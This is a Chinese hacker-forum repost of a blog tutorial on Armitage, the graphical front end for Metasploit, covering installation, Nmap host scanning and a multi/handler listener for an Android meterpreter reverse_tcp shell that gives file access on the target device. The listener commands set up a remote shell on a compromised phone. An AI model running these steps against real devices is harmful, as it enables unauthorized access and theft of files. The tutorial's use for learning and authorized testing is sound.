跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于
Armitage是一款基于Java的Metasploit图形界面化的攻击软件,可以用它结合 Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式使用Metasploit难度较高,需要记忆的命令过多,而Armitage完美的解决了这一问题,用户只需要简单的点击菜单,就可以实现对目标主机的安全测试和攻击。Armitage良好的图形展示界面,使得攻击过程更加直观,用户体验更好。因其操作的简单性,尤其适合Metasploit初学者对目标系统进行安全测试和攻击。

Armitage

Armitage安装

Armitage的安装很简单,我们只需要执行下面命令即可。

apt-get update
apt-get install -y armitage

运行Armitage

首先初始化msf数据库,执行命令

msfdb init

1217458607.png
然后执行命令armitage启动程序。
2988396440.png
登录后界面如下
4039900432.png

主机扫描

依次点击Hosts->Nmap Scan这里扫描方式有多种,都是基于nmap完成扫描的。当然也可以利用msf进行扫描。
2858891689.png
如上,我们扫描到了此设备,点击设备右键可选择针对此设备的攻击模块。

相关shell操作

这里我们以android shell为列
首先在kali中生成基于android的shell
然后配置终端

use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.50.123
set LPORT 443
exploit -j

运行shell后,成功获得权限
1592049654.png
可视化的文件管理
3642206387.png

总结

armitage将msf命令和结果通过图形化的形式展现出来。方便我们对文件的预览上传和下载。当然也有其缺点,必要msfdb数据库的配置就显得很鸡肋。


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3359.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。